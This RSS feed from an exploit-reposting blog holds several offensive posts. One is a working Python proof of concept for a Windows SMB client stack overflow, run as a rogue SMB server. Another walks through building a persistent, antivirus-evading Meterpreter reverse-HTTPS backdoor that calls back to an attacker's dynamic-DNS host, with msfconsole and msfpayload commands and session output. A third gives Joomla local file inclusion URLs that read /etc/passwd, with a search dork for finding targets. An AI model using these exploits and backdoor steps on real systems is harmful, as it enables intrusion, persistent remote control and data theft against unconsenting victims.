<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>Bamboo House</title>
	<atom:link href="http://rumahbamboo.wordpress.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://rumahbamboo.wordpress.com</link>
	<description>Vurnability of The World</description>
	<lastBuildDate>Sat, 17 Apr 2010 15:35:50 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.com/</generator>
<cloud domain='rumahbamboo.wordpress.com' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>http://s2.wp.com/i/buttonw-com.png</url>
		<title>Bamboo House</title>
		<link>http://rumahbamboo.wordpress.com</link>
	</image>
	<atom:link rel="search" type="application/opensearchdescription+xml" href="http://rumahbamboo.wordpress.com/osd.xml" title="Bamboo House" />
	<atom:link rel='hub' href='http://rumahbamboo.wordpress.com/?pushpress=hub'/>
		<item>
		<title>Windows 7/2008R2 SMB Client Trans2 Stack Overflow 10-020 PoC</title>
		<link>http://rumahbamboo.wordpress.com/2010/04/17/windows-72008r2-smb-client-trans2-stack-overflow-10-020-poc/</link>
		<comments>http://rumahbamboo.wordpress.com/2010/04/17/windows-72008r2-smb-client-trans2-stack-overflow-10-020-poc/#comments</comments>
		<pubDate>Sat, 17 Apr 2010 15:35:50 +0000</pubDate>
		<dc:creator>rumahbamboo</dc:creator>
				<category><![CDATA[Backtrack]]></category>
		<category><![CDATA[Exploit]]></category>

		<guid isPermaLink="false">http://rumahbamboo.wordpress.com/?p=105</guid>
		<description><![CDATA[== Start Code == import sys,SocketServer EBP = "\x42\x42\x42\x42" EIP = "\x41\x41\x41\x41" packetnego = ( "\x00\x00\x00\x55" "\xff\x53\x4d\x42\x72\x00\x00\x00\x00\x98\x53\xc8\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe\x00\x00\x00\x00" "\x11\x05\x00\x03\x0a\x00\x01\x00\x04\x11\x00\x00\x00\x00\x01\x00" "\x00\x00\x00\x00\xfd\xe3\x00\x80\x1a\x49\xf9\x22\xfb\x86\xca\x01" "\x88\xff\x00\x10\x00\xf0\xe4\x54\xc4\x50\x6c\xb2\x4a\xb9\x3a\x6b" "\xcf\xb0\x8c\x8d\xaf" ) packetsession = ( "\x00\x00\x01\x3d" "\xff\x53\x4d\x42\x73\x16\x00\x00\xc0\x98\x07\xc8\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe\x00\x08\x10\x00" "\x04\xff\x00\x3d\x01\x00\x00\xc8\x00\x12\x01\x4e\x54\x4c\x4d\x53" "\x53\x50\x00\x02\x00\x00\x00\x0c\x00\x0c\x00\x38\x00\x00\x00\x15" "\x82\x8a\xe2\x16\x7a\x68\x5f\xc6\x0c\x78\xd8\x00\x00\x00\x00\x00" "\x00\x00\x00\x84\x00\x84\x00\x44\x00\x00\x00\x05\x01\x28\x0a\x00" "\x00\x00\x0f\x46\x00\x55\x00\x43\x00\x4b\x00\x55\x00\x32\x00\x02" "\x00\x0c\x00\x46\x00\x55\x00\x43\x00\x4b\x00\x55\x00\x32\x00\x01" "\x00\x0c\x00\x46\x00\x55\x00\x43\x00\x4b\x00\x55\x00\x32\x00\x04" "\x00\x22\x00\x66\x00\x75\x00\x63\x00\x6b\x00\x75\x00\x32\x00\x2e" "\x00\x74\x00\x65\x00\x73\x00\x74\x00\x2e\x00\x6c\x00\x6f\x00\x63" "\x00\x61\x00\x6c\x00\x03\x00\x22\x00\x66\x00\x75\x00\x63\x00\x6b" "\x00\x75\x00\x32\x00\x2e\x00\x74\x00\x65\x00\x73\x00\x74\x00\x2e" "\x00\x6c\x00\x6f\x00\x63\x00\x61\x00\x6c\x00\x06\x00\x04\x00\x01" "\x00\x00\x00\x07\x00\x08\x00\xe8\x62\xc8\x16\xfb\x86\xca\x01\x00" "\x00\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00" "\x73\x00\x20\x00\x35\x00\x2e\x00\x31\x00\x00\x00\x57\x00\x69\x00" "\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00" "\x30\x00\x30\x00\x20\x00\x4c\x00\x41\x00\x4e\x00\x20\x00\x4d\x00" "\x61\x00\x6e\x00\x61\x00\x67\x00\x65\x00\x72\x00\x00" ) packetsession2 = ( "\x00\x00\x00\x75" "\xff\x53\x4d\x42\x73\x00\x00\x00\x00\x98\x07\xc8\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe\x00\x08\x20\x00" "\x04\xff\x00\x75\x00\x01\x00\x00\x00\x4a\x00\x00\x57\x00\x69\x00" <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=rumahbamboo.wordpress.com&amp;blog=12547398&amp;post=105&amp;subd=rumahbamboo&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<pre>== Start Code ==

import sys,SocketServer

EBP = "\x42\x42\x42\x42"
EIP = "\x41\x41\x41\x41"

packetnego = (
"\x00\x00\x00\x55"
"\xff\x53\x4d\x42\x72\x00\x00\x00\x00\x98\x53\xc8\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe\x00\x00\x00\x00"
"\x11\x05\x00\x03\x0a\x00\x01\x00\x04\x11\x00\x00\x00\x00\x01\x00"
"\x00\x00\x00\x00\xfd\xe3\x00\x80\x1a\x49\xf9\x22\xfb\x86\xca\x01"
"\x88\xff\x00\x10\x00\xf0\xe4\x54\xc4\x50\x6c\xb2\x4a\xb9\x3a\x6b"
"\xcf\xb0\x8c\x8d\xaf"
)
<span id="more-105"></span>
packetsession = (
"\x00\x00\x01\x3d"
"\xff\x53\x4d\x42\x73\x16\x00\x00\xc0\x98\x07\xc8\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe\x00\x08\x10\x00"
"\x04\xff\x00\x3d\x01\x00\x00\xc8\x00\x12\x01\x4e\x54\x4c\x4d\x53"
"\x53\x50\x00\x02\x00\x00\x00\x0c\x00\x0c\x00\x38\x00\x00\x00\x15"
"\x82\x8a\xe2\x16\x7a\x68\x5f\xc6\x0c\x78\xd8\x00\x00\x00\x00\x00"
"\x00\x00\x00\x84\x00\x84\x00\x44\x00\x00\x00\x05\x01\x28\x0a\x00"
"\x00\x00\x0f\x46\x00\x55\x00\x43\x00\x4b\x00\x55\x00\x32\x00\x02"
"\x00\x0c\x00\x46\x00\x55\x00\x43\x00\x4b\x00\x55\x00\x32\x00\x01"
"\x00\x0c\x00\x46\x00\x55\x00\x43\x00\x4b\x00\x55\x00\x32\x00\x04"
"\x00\x22\x00\x66\x00\x75\x00\x63\x00\x6b\x00\x75\x00\x32\x00\x2e"
"\x00\x74\x00\x65\x00\x73\x00\x74\x00\x2e\x00\x6c\x00\x6f\x00\x63"
"\x00\x61\x00\x6c\x00\x03\x00\x22\x00\x66\x00\x75\x00\x63\x00\x6b"
"\x00\x75\x00\x32\x00\x2e\x00\x74\x00\x65\x00\x73\x00\x74\x00\x2e"
"\x00\x6c\x00\x6f\x00\x63\x00\x61\x00\x6c\x00\x06\x00\x04\x00\x01"
"\x00\x00\x00\x07\x00\x08\x00\xe8\x62\xc8\x16\xfb\x86\xca\x01\x00"
"\x00\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00"
"\x73\x00\x20\x00\x35\x00\x2e\x00\x31\x00\x00\x00\x57\x00\x69\x00"
"\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00"
"\x30\x00\x30\x00\x20\x00\x4c\x00\x41\x00\x4e\x00\x20\x00\x4d\x00"
"\x61\x00\x6e\x00\x61\x00\x67\x00\x65\x00\x72\x00\x00"
)

packetsession2 = (
"\x00\x00\x00\x75"
"\xff\x53\x4d\x42\x73\x00\x00\x00\x00\x98\x07\xc8\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe\x00\x08\x20\x00"
"\x04\xff\x00\x75\x00\x01\x00\x00\x00\x4a\x00\x00\x57\x00\x69\x00"
"\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x35\x00\x2e\x00"
"\x31\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00"
"\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x4c\x00"
"\x41\x00\x4e\x00\x20\x00\x4d\x00\x61\x00\x6e\x00\x61\x00\x67\x00"
"\x65\x00\x72\x00\x00"
)

packetree = (
"\x00\x00\x00\x38"
"\xff\x53\x4d\x42\x75\x00\x00\x00\x00\x98\x07\xc8\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\xff\xfe\x00\x08\x30\x00"
"\x07\xff\x00\x38\x00\x01\x00\xff\x01\x00\x00\xff\x01\x00\x00\x07"
"\x00\x49\x50\x43\x00\x00\x00\x00"
)

packetntcreate = (
"\x00\x00\x00\x87"
"\xff\x53\x4d\x42\xa2\x00\x00\x00\x00\x98\x07\xc8\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x84\x08\x00\x08\x40\x00"
"\x2a\xff\x00\x87\x00\x00\x00\x40\x01\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00"
"\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x02\x00\xff\x05\x00\xff\xa2\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x9b\x01\x12"
"\x00\x9b\x01\x12\x00\x00\x00"
)

packetrans = (
"\x00\x00\x00\x5a"
"\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x98\x07\xc8\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x30\x0b\x00\x08\x50\x00"
"\x0a\x02\x00\x18\x00\x00\x00\x02\x00\x38\x00\x00\x00\x18\x00\xff"
"\xff\x00\x00\x00\x00\x1f\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x50\x51\x52\x53\x54\x55\x56"
"\x02\x61"+EBP+EIP
)

class SMB1(SocketServer.BaseRequestHandler):

    def server_bind(self):
       self.socket.setsockopt(SOL_SOCKET, SO_REUSEADDR,SO_REUSEPORT, 1)
       self.socket.bind(self.server_address)

    def handle(self):
      try:
       while True:
         print "From:", self.client_address
         data = self.request.recv(1024)

         ##Negotiate Protocol Response
         if data[8] == "\x72":
           self.request.send(packetnego)
           print "Negotiate Response sent\n"

         ##Session Setup AndX Response, NTLMSSP_CHALLENGE, Error: STATUS_MORE_PROCESSING_REQUIRED
         if data[8] == "\x73":
           self.request.send(packetsession)
           print "Session Response sent\n"
           #Session Setup AndX Response
           data = self.request.recv(1024)
           if data[8] == "\x73":
              self.request.send(packetsession2)
              print "Session 2 Response sent\n"

         ##Tree Connect AndX Response
         if data[8] == "\x75":
           self.request.send(packetree)
           print "TREE Response sent\n"

         ##NT Create AndX Response, FID: 0x4000
         if data[8] == "\xa2":
           self.request.send(packetntcreate)
           print "NT create Response sent\n"

         ####Trans2 Response, QUERY_FS_INFO
         if data[8] == "\x32":
           self.request.send(packetrans)
           print "Trans2 Response sent box pwned\n"

      except Exception:
         print "oups"
         self.request.close()
         print "Disconnected from", self.client_address

SocketServer.TCPServer.allow_reuse_address = 1
launch = SocketServer.TCPServer(('', 445),SMB1)
launch.serve_forever()

== End Code ==
</pre>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/rumahbamboo.wordpress.com/105/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/rumahbamboo.wordpress.com/105/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/rumahbamboo.wordpress.com/105/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/rumahbamboo.wordpress.com/105/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/rumahbamboo.wordpress.com/105/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/rumahbamboo.wordpress.com/105/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/rumahbamboo.wordpress.com/105/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/rumahbamboo.wordpress.com/105/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/rumahbamboo.wordpress.com/105/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/rumahbamboo.wordpress.com/105/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/rumahbamboo.wordpress.com/105/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/rumahbamboo.wordpress.com/105/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/rumahbamboo.wordpress.com/105/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/rumahbamboo.wordpress.com/105/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=rumahbamboo.wordpress.com&amp;blog=12547398&amp;post=105&amp;subd=rumahbamboo&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://rumahbamboo.wordpress.com/2010/04/17/windows-72008r2-smb-client-trans2-stack-overflow-10-020-poc/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/532b44437e225e495b7bc6caa60accc3?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">rumahbamboo</media:title>
		</media:content>
	</item>
		<item>
		<title>Persistent Meterpreter over Reverse HTTPS</title>
		<link>http://rumahbamboo.wordpress.com/2010/04/17/persistent-meterpreter-over-reverse-https/</link>
		<comments>http://rumahbamboo.wordpress.com/2010/04/17/persistent-meterpreter-over-reverse-https/#comments</comments>
		<pubDate>Sat, 17 Apr 2010 14:14:30 +0000</pubDate>
		<dc:creator>rumahbamboo</dc:creator>
				<category><![CDATA[Backtrack]]></category>
		<category><![CDATA[Exploit]]></category>

		<guid isPermaLink="false">http://rumahbamboo.wordpress.com/?p=103</guid>
		<description><![CDATA[Botnet agents and malware go through inordinate lengths to hide their command and control traffic. From a penetration testing perspective, emulating these types of communication channels is possible, but often requires a custom toolkit to be deployed to the target. In this post I will walk through using the standard Metasploit Meterpreter payload as a <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=rumahbamboo.wordpress.com&amp;blog=12547398&amp;post=103&amp;subd=rumahbamboo&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Botnet agents and malware go through inordinate lengths to hide their command and control traffic. From a penetration testing perspective, emulating these types of communication channels is possible, but often requires a custom toolkit to be deployed to the target. In this post I will walk through using the standard Metasploit Meterpreter payload as a persistent encrypted remote control tool.</p>
<p>First things first, grab the latest version of Metasploit (3.3.3) and update to the latest SVN snapshot. Revision r9058 or newer will work for this example.</p>
<p>Next, we need to setup a listening station for the remote system to connect to. This is the system that will be running msfconsole and handling the incoming connections. The two important variables here are the hostname or IP address (LHOST) and the listening port (LPORT). If you do not have access to a dedicated external system, you will need to configure your local firewall or NAT gateway to forward LPORT from the external interface to your listener. In this example, we want to use the brand new reverse_https stager, which in addition to going over SSL has the benefit of resolving DNS at runtime. This stager, along with reverse_tcp_dns, allows an actual hostname to be specified in the LHOST parameter. If you are using a dynamic DNS service, this would allow the reverse connect payload to follow your DNS changes.<br />
<span id="more-103"></span>Assuming we are running Metasploit on a typical broadband connection and behind a NAT gateway, we would first register our system with a dynamic DNS service (metasploit.kicks-ass.net), choose a listening port (8443) and then forward this from the NAT gateway to our internal machine running Metasploit. Once the port forward has been configured and the dynamic DNS entry has been activated, we can start msfconsole:</p>
<p>$ msfconsole<br />
msf &gt; use exploit/multi/handler<br />
msf exploit(handler) &gt; set PAYLOAD windows/meterpreter/reverse_https<br />
msf exploit(handler) &gt; set LPORT 8443<br />
msf exploit(handler) &gt; set LHOST metasploit.kicks-ass.net<br />
msf exploit(handler) &gt; set ExitOnSession false<br />
msf exploit(handler) &gt; exploit -j<br />
[*] HTTPS listener started on http://metasploit.kicks-ass.net:8443/<br />
[*] Starting the payload handler&#8230;</p>
<p>Once the listener has been configured, you can test whether the handler is working properly by using a third-party web site test tool that supports SSL. I have had success using WAVE, but any &#8220;site check&#8221; tool will indicate whether the handler is accessible. If you access the handler URL in your browser, you should see an invalid SSL certificate prompt followed by a &#8220;No site configured at this address&#8221; message.</p>
<p>After the listener has been configured and tested, its time to create the actual persistent Meterpreter connect-back script. In order to avoid some of the more bothersome AV products, it makes sense to use a benign executable as a &#8220;template&#8221; and inject the payload inside, then wrap this all in a script. On your system running Metasploit, identify an executable to use as the template. I often use the standard calc.exe that ships with Windows operating system, but any moderately-sized EXE will do. Once the template has been identified, create a reverse_https Meterpreter, using the EXE template, wrapped in a script, with a persistent retry. The following command does this:</p>
<p>$ msfpayload windows/meterpreter/reverse_https LHOST=metasploit.kicks-ass.net LPORT=8443 R |<br />
msfencode -x calc.exe -t loop-vbs -o final.vbs<br />
[*] x86/shikata_ga_nai succeeded with size 408 (iteration=1)<br />
$ ls -la final.vbs<br />
-rw-r&#8211;r&#8211; 1 hdm hdm 955641 Apr 13 08:51 final.vbs</p>
<p>Finally, execute the VBS on the target system, and enjoy a 100% SSL-encrypted, DNS-aware, persistent remote connect-back. The reconnect interval can be changed by editing the VBS script itself (all the way at the bottom). To stop the connect-back, simply kill the wscript.exe process. To make this persist across reboots, add this to the standard Run key or the Startup folder.</p>
<p>[*] A.B.C.D:53386 Request received for /AVkev&#8230;<br />
[*] A.B.C.D:53386 Staging connection for target Vkev received&#8230;<br />
[*] Patching Target ID Vkev into DLL<br />
[*] A.B.C.D:53387 Request received for /BVkev&#8230;<br />
[*] A.B.C.D:53387 Stage connection for target Vkev received&#8230;<br />
[*] Meterpreter session 2 opened (192.168.0.228:8443 -&gt; A.B.C.D:53387)</p>
<p>msf exploit(handler) &gt; sessions -i 2<br />
[*] Starting interaction with 2&#8230;</p>
<p>meterpreter &gt; getuid<br />
Server username: metal\dev</p>
<p>meterpreter &gt; ps</p>
<p>Process list<br />
============</p>
<p>PID   Name                          Arch  Session  User       Path<br />
&#8212;   &#8212;-                          &#8212;-  &#8212;&#8212;-  &#8212;-       &#8212;-<br />
0     [System Process]<br />
4     System<br />
404   smss.exe<br />
520   csrss.exe<br />
584   wininit.exe<br />
608   csrss.exe<br />
648   services.exe<br />
668   lsass.exe<br />
676   lsm.exe<br />
792   svchost.exe<br />
852   nvvsvc.exe<br />
892   svchost.exe<br />
[truncated]</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/rumahbamboo.wordpress.com/103/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/rumahbamboo.wordpress.com/103/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/rumahbamboo.wordpress.com/103/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/rumahbamboo.wordpress.com/103/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/rumahbamboo.wordpress.com/103/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/rumahbamboo.wordpress.com/103/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/rumahbamboo.wordpress.com/103/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/rumahbamboo.wordpress.com/103/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/rumahbamboo.wordpress.com/103/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/rumahbamboo.wordpress.com/103/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/rumahbamboo.wordpress.com/103/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/rumahbamboo.wordpress.com/103/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/rumahbamboo.wordpress.com/103/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/rumahbamboo.wordpress.com/103/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=rumahbamboo.wordpress.com&amp;blog=12547398&amp;post=103&amp;subd=rumahbamboo&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://rumahbamboo.wordpress.com/2010/04/17/persistent-meterpreter-over-reverse-https/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/532b44437e225e495b7bc6caa60accc3?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">rumahbamboo</media:title>
		</media:content>
	</item>
		<item>
		<title>Joomla Component com_rwcards &#8211; Local File Inclusion</title>
		<link>http://rumahbamboo.wordpress.com/2010/03/16/joomla-component-com_rwcards-local-file-inclusion/</link>
		<comments>http://rumahbamboo.wordpress.com/2010/03/16/joomla-component-com_rwcards-local-file-inclusion/#comments</comments>
		<pubDate>Tue, 16 Mar 2010 22:57:53 +0000</pubDate>
		<dc:creator>rumahbamboo</dc:creator>
				<category><![CDATA[Web Application]]></category>
		<category><![CDATA[Joomla Vurnabillity]]></category>

		<guid isPermaLink="false">http://rumahbamboo.wordpress.com/2010/03/16/joomla-component-com_rwcards-local-file-inclusion/</guid>
		<description><![CDATA[# Title: Joomla Component com_rwcards &#8211; Local File Inclusion # EDB-ID: 11772 # CVE-ID: () # OSVDB-ID: () # Author: altbta # Published: 2010-03-16 # Verified: yes # Download Exploit Code # Download N/A &#60;!&#8211; --&#62; view source print? #################################################################### &#62;&#62;&#62;&#62;&#62; Author : altbta [l_9@hotmail.com&#60;mailto:l_9@hotmail.com&#62;] &#62;&#62;&#62;&#62;&#62; Team : Sec Attack Team &#62;&#62;&#62;&#62;&#62; Home : www.v4-team.com/cc&#60;http://www.v4-team.com/cc&#62; <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=rumahbamboo.wordpress.com&amp;blog=12547398&amp;post=100&amp;subd=rumahbamboo&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p># Title: Joomla Component com_rwcards &#8211; Local File Inclusion<br />
# EDB-ID: 11772<br />
# CVE-ID: ()<br />
# OSVDB-ID: ()<br />
# Author: altbta<br />
# Published: 2010-03-16<br />
# Verified: yes<br />
# Download <a href="http://www.exploit-db.com/download/11772">Exploit Code</a><br />
# Download N/A</p>
<p>&lt;!&#8211;</pre>
<p>--&gt;<span id="more-100"></span></p>
<div id="highlighter_303308">
<div>
<div><a title="view source" href="http://www.exploit-db.com/exploits/11772#viewSource">view source</a></p>
<div></div>
<p><a title="print" href="http://www.exploit-db.com/exploits/11772#printSource">print</a><a title="?" href="http://www.exploit-db.com/exploits/11772#about">?</a></div>
</div>
<div>
<div>
<table>
<tbody>
<tr>
<td><code>####################################################################</code></td>
</tr>
</tbody>
</table>
</div>
<div>
<table>
<tbody>
<tr>
<td><code>&gt;&gt;&gt;&gt;&gt; Author : altbta [l_9@hotmail.com&lt;mailto:l_9@hotmail.com&gt;]</code></td>
</tr>
</tbody>
</table>
</div>
<div>
<table>
<tbody>
<tr>
<td><code>&gt;&gt;&gt;&gt;&gt; Team : Sec Attack Team</code></td>
</tr>
</tbody>
</table>
</div>
<div>
<table>
<tbody>
<tr>
<td><code>&gt;&gt;&gt;&gt;&gt; Home : www.v4-team.com/cc&lt;http://www.v4-team.com/cc&gt;</code></td>
</tr>
</tbody>
</table>
</div>
<div>
<table>
<tbody>
<tr>
<td><code>&gt;&gt;&gt;&gt;&gt; Script : Joomla Component com_rwcards</code></td>
</tr>
</tbody>
</table>
</div>
<div>
<table>
<tbody>
<tr>
<td><code>&gt;&gt;&gt;&gt;&gt; Bug Type : Local File Inclusion [LFI]</code></td>
</tr>
</tbody>
</table>
</div>
<div>
<table>
<tbody>
<tr>
<td><code>&gt;&gt;&gt;&gt;&gt; Dork : inurl:"com_rwcards"</code></td>
</tr>
</tbody>
</table>
</div>
<div>
<table>
<tbody>
<tr>
<td></td>
</tr>
</tbody>
</table>
</div>
<div>
<table>
<tbody>
<tr>
<td><code>####################################################################</code></td>
</tr>
</tbody>
</table>
</div>
<div>
<table>
<tbody>
<tr>
<td></td>
</tr>
</tbody>
</table>
</div>
<div>
<table>
<tbody>
<tr>
<td><code>===[ Exploit ]===</code></td>
</tr>
</tbody>
</table>
</div>
<div>
<table>
<tbody>
<tr>
<td></td>
</tr>
</tbody>
</table>
</div>
<div>
<table>
<tbody>
<tr>
<td><code>http://site/index.php?option=com_rwcards&amp;view=rwcards&amp;controller=[LFI]</code></td>
</tr>
</tbody>
</table>
</div>
<div>
<table>
<tbody>
<tr>
<td><code>http://site/index.php?option=com_rwcards&amp;view=rwcards&amp;controller=../../../../../../../../../../etc/passwd%00</code></td>
</tr>
</tbody>
</table>
</div>
<div>
<table>
<tbody>
<tr>
<td></td>
</tr>
</tbody>
</table>
</div>
<div>
<table>
<tbody>
<tr>
<td><code>and</code></td>
</tr>
</tbody>
</table>
</div>
<div>
<table>
<tbody>
<tr>
<td></td>
</tr>
</tbody>
</table>
</div>
<div>
<table>
<tbody>
<tr>
<td><code>http://site/index.php?option=com_rwcards&amp;controller=[LFI]</code></td>
</tr>
</tbody>
</table>
</div>
<div>
<table>
<tbody>
<tr>
<td><code>http://site/index.php?option=com_rwcards&amp;controller=../../../../../../../../../../etc/passwd%00</code></td>
</tr>
</tbody>
</table>
</div>
<div>
<table>
<tbody>
<tr>
<td></td>
</tr>
</tbody>
</table>
</div>
<div>
<table>
<tbody>
<tr>
<td><code>####################################################################</code></td>
</tr>
</tbody>
</table>
</div>
<div>
<table>
<tbody>
<tr>
<td><code>RxH &amp; &#1575;&#1576;&#1608; &#1593;&#1584;&#1575;&#1576;</code></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/rumahbamboo.wordpress.com/100/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/rumahbamboo.wordpress.com/100/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/rumahbamboo.wordpress.com/100/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/rumahbamboo.wordpress.com/100/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/rumahbamboo.wordpress.com/100/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/rumahbamboo.wordpress.com/100/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/rumahbamboo.wordpress.com/100/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/rumahbamboo.wordpress.com/100/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/rumahbamboo.wordpress.com/100/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/rumahbamboo.wordpress.com/100/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/rumahbamboo.wordpress.com/100/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/rumahbamboo.wordpress.com/100/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/rumahbamboo.wordpress.com/100/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/rumahbamboo.wordpress.com/100/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=rumahbamboo.wordpress.com&amp;blog=12547398&amp;post=100&amp;subd=rumahbamboo&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://rumahbamboo.wordpress.com/2010/03/16/joomla-component-com_rwcards-local-file-inclusion/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/532b44437e225e495b7bc6caa60accc3?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">rumahbamboo</media:title>
		</media:content>
	</item>
		<item>
		<title>Capturing Logon Credentials with Meterpreter</title>
		<link>http://rumahbamboo.wordpress.com/2010/03/13/capturing-logon-credentials-with-meterpreter/</link>
		<comments>http://rumahbamboo.wordpress.com/2010/03/13/capturing-logon-credentials-with-meterpreter/#comments</comments>
		<pubDate>Sat, 13 Mar 2010 08:43:54 +0000</pubDate>
		<dc:creator>rumahbamboo</dc:creator>
				<category><![CDATA[Metasploit]]></category>
		<category><![CDATA[snifing]]></category>

		<guid isPermaLink="false">http://rumahbamboo.wordpress.com/?p=98</guid>
